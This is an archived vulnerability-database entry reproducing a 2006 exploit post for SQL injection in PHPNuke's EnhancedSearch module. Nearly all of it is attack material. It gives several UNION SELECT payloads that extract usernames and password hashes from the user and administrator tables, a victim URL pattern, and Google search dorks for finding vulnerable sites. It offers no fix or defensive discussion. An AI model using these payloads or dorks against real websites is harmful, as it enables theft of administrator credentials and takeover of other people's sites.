Lucene search
SecurityvulnsSECURITYVULNS:DOC:12440HistoryApr 27, 2006 - 12:00 a.m.
PHPNuke All Version EnhancedSearch Module SQL Injection Exploit {!}
2006-04-2700:00:00
vulners.com
10
PHPNuke All Version EnhancedSearch Module SQL Injection Exploit {!}
Site : http://www.phpnuke.org
Demo : http://www.dsty-inside.de
SQL Injection :
EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*
EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
http://www.victim.com/path/modules.php?name=EnhancedSearch
Search :
EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Administrator MD5 Hash {!!!}
google:
"Enhanced Search Version 2.0: Powered by"
inurl:"modules.php?name=EnhancedSearch"
Credit : WiLdBoY
E-mail : [email protected]
Site : www.ayyildiz.org